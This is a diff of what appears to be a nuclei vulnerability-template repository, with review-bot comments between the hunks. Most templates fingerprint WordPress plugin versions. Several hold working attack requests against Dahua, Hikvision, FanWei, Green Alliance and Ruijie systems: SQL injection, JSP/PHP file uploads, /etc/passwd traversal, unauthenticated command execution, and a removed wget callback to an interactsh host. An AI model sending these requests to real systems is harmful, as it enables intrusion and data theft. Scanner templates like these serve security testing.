+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-product-feed-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.0') \ No newline at end of file 
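Review bot: `severity: low` and the `low` tag do not match the declared `cvss-score: 4.3`, which is Medium under CVSS v3.1; `severity: medium` keeps the template consistent with its own classification. The template lives in `poc/sql/` but describes a missing-capability authorization bug, not SQL injection, so it will be skipped by anyone running the SQL directory on purpose and wrongly included by anyone excluding it. The readme `Stable tag` check never calls any feed action, so a sentence such as `Version fingerprint only; no feed action is attempted.` would stop readers treating a hit as a confirmed authorization bypass.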
diff --git a/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml b/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml new file mode 100644 index 0000000000..1af3b7e51d --- /dev/null +++ b/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml @@ -0,0 +1,59 @@ +id: compute-links-a7a90df4c2ee2fb79d7db37dc725b006 + +info: + name: > + Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/compute-links/" + google-query: inurl:"/wp-content/plugins/compute-links/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,compute-links,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "compute-links" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
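Review bot: The `description`, `cvss-metrics`, `cvss-score` and `cve-id` keys are all empty while the template still carries `severity: critical` and a `cve` tag, and `shodan-query: 'vuln:'` is a literal query with no identifier that matches nothing. Either fill these from the referenced Wordfence advisory or drop the empty keys and the `cve` tag so that downstream tooling does not index an unexplained critical "Unauthenticated Remote File Inclusion" with no CVE behind it; a `severity` without a score or description is hard to justify to a triager. The same blank-field pattern appears in the other `?source=api-scan` templates in this commit (houzez, newsletters-lite, ultimate-addons-for-elementor, void-elementor-post-grid, wpforo). Like the rest, this is a readme `Stable tag` fingerprint only and never attempts an inclusion, which the description should say once it exists.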
@@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml b/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml new file mode 100644 index 0000000000..ef8d5d9932 --- /dev/null +++ b/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml 
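Review bot: The new matcher `'status_code_1 == 200 && len(body) > 0'` is satisfied by essentially any host that answers the POST with a 200 and a body, so this template will report "arbitrary file upload" on unrelated servers; the trailing comment `# /attachment/3466744850/xxx.php` suggests the real signal is the upload path returned by `uploadify.php`, and the matcher should key on that (for example a `contains(body_1, "attachment")` check plus a second request that fetches the returned path and looks for a unique marker) rather than on any non-empty body. The template also writes a real `test.php` to the target with an empty body and no `intrusive` tag, so it is executed by default runs that exclude intrusive checks; add `tags: intrusive` and use `{{randstr}}.php` instead of a fixed name so artifacts are attributable. `Content-Length: 259` is hardcoded in a raw request; if nuclei does not recompute it for this body the request will be truncated or hang, so I'd drop the header. Finally the file is still named `ecology-oa-HrmCareerApplyPerView-sqli.yaml` under `poc/sql/` although it now tests an E-Office uploadify upload, and the unchanged `id: FanWei` is shared with other templates in the repo.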
@@ -0,0 +1,59 @@ +id: houzez-9a635670fedb497fead8ede7dc06b417 + +info: + name: > + Houzez <= 3.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/houzez/" + google-query: inurl:"/wp-content/themes/houzez/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,houzez,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/houzez/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "houzez" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.4') \ No newline at end of file diff --git a/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml b/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml new file mode 100644 index 0000000000..3c3326fc0b --- /dev/null +++ b/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml 
@@ -0,0 +1,59 @@ +id: html5-video-player-66d1c126fdb6da3483cf3a67e28954d4 + +info: + name: > + Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.31') \ No newline at end of file diff --git a/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml b/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml new file mode 100644 index 0000000000..c516483860 --- /dev/null +++ b/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml 
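Review bot: This template duplicates `CVE-2024-43319-0ae4b0bc…yaml` added in the same commit — same Wordfence advisory `604862d9-e032-4806-8a14-3e4ad0ae1ee2`, same readme path, same `<= 2.5.31` check — but with the `description`, `cvss-metrics`, `cvss-score` and `cve-id` fields blank and `shodan-query: 'vuln:'` empty, so one vulnerable site will produce two findings, one of them carrying no context. I'd drop this copy, or at minimum set `cve-id: CVE-2024-43319` and the same classification so the pair deduplicate on the CVE. The `cve` tag on a template with no `cve-id` is also misleading for tag-based selection.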
@@ -0,0 +1,59 @@ +id: newsletters-lite-5aa068832cbc4a3ddba8709b001a467b + +info: + name: > + Newsletters <= 4.9.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,newsletters-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.8') \ No newline at end of file diff --git a/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml b/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml new file mode 100644 index 0000000000..9ece6e3aa1 --- /dev/null +++ b/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml 
@@ -0,0 +1,59 @@ +id: ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457 + +info: + name: > + Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml b/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml new file mode 100644 index 0000000000..0b3c5fb47b --- /dev/null +++ b/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml 
@@ -0,0 +1,59 @@ +id: void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449 + +info: + name: > + Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "void-elementor-post-grid-addon-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml b/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml new file mode 100644 index 0000000000..3f5e5ea6fa --- /dev/null +++ b/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml 
@@ -0,0 +1,59 @@ +id: wpforo-3618db85525168de727aa60e2eab2dfa + +info: + name: > + wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
@@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 77936cf562..78d89c1465 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
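Review bot: This is a byte-identical second copy of `poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml` from the same commit, so the two files will drift and both will fire on the same host; one location with a symlink or a single path in `poc.txt` would avoid that. The matcher `'status_code_1 == 200 && len(body) > 0'` accepts almost any 200 response as proof of upload, and the template drops a fixed `test.php` on the target without an `intrusive` tag — the same problems as the other copy. The file name and the `poc/sql_injection/` directory still say HrmCareerApplyPerView SQL injection while the content is now an uploadify file upload, and `id: FanWei` is not unique in the repository, which nuclei warns about.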
@@ -1,31 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" + + http: - method: GET path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" matchers-condition: and matchers: - type: word part: body words: - - "loginName" - - "loginPass" + - "c4ca" - type: status status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action + - 500 diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index e86e8491d1..538f6fd6d5 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml 
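Review bot: The body matcher now looks for the four characters `c4ca`, which is short enough to appear in any hex token, session id or hash on an error page and will produce false positives; `md5(1)` is `c4ca4238a0b923820dcc509a6f75849b`, and since `updatexml` truncates the XPath error text at 32 characters the reliable token is the `~`-prefixed leading part, so I'd match `- "~c4ca4238a0b9"` instead. The template also insists on `status: 500`; some builds return the SQL error with a 200, so consider matching on the token alone or on `500` or `200` with an `or` condition — I have not verified this platform's behaviour. The file is still named `Dahua_Video_FileUpload.yaml` under `poc/upload/` although it is now an SQL injection check, and `id: Dahua` is reused by other templates.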
@@ -1,19 +1,20 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - raw: - | - POST /svm/api/external/report HTTP/1.1 + POST /center/api/files;.html HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -24,17 +25,11 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' + - 'contains(body_1, "test.jsp")' condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
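Review bot: With the second request removed, the only evidence is `contains(body_1, "test.jsp")`, i.e. the server echoing the submitted filename, which does not show the file was stored or is reachable; if a verification GET is not possible for `/center/api/files`, the description should say the match is "filename echoed by the upload API" rather than a confirmed upload. The template still writes a real JSP (`<%out.print("test");%>` under a fixed name `test.jsp`) to the target but carries no `intrusive` tag, so default non-intrusive runs execute it — add `intrusive` and use `{{randstr}}.jsp` with a random marker so artifacts are attributable. The `;.html` suffix on `POST /center/api/files;.html` looks like a path-parameter filter bypass and deserves a line in the description. The multipart `Content-Disposition`/filename lines sit between the two hunks and are outside this view.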
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index b35ef84818..1cd783867f 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml +++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml 
@@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index fa3aafbfe2..c7afb0444b 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml 
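Review bot: `Cmdnum: '1'` is inside a raw request block, so the single quotes are sent on the wire as part of the header value; the EXCU_SHELL interface as I recall it expects a bare number, so this should be `Cmdnum: 1` — please confirm against a device. `Command1: show running-config` pulls the device's full configuration, which commonly includes credential hashes and SNMP communities, and the template neither tags itself `intrusive` nor says so in the description; a less sensitive command such as `show version` with a matching matcher would prove the same exposure. The `description` merely repeats the `name` (with a stray space in `EXCU_ SHELL`); something like `The Ruijie switch web console executes commands passed in the Cmdnum/CommandN headers of an unauthenticated request to /EXCU_SHELL.` would help triage. The file is still named `Ruijie_NBR_Router_fileupload.yaml` under `poc/upload/` although nothing is uploaded.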
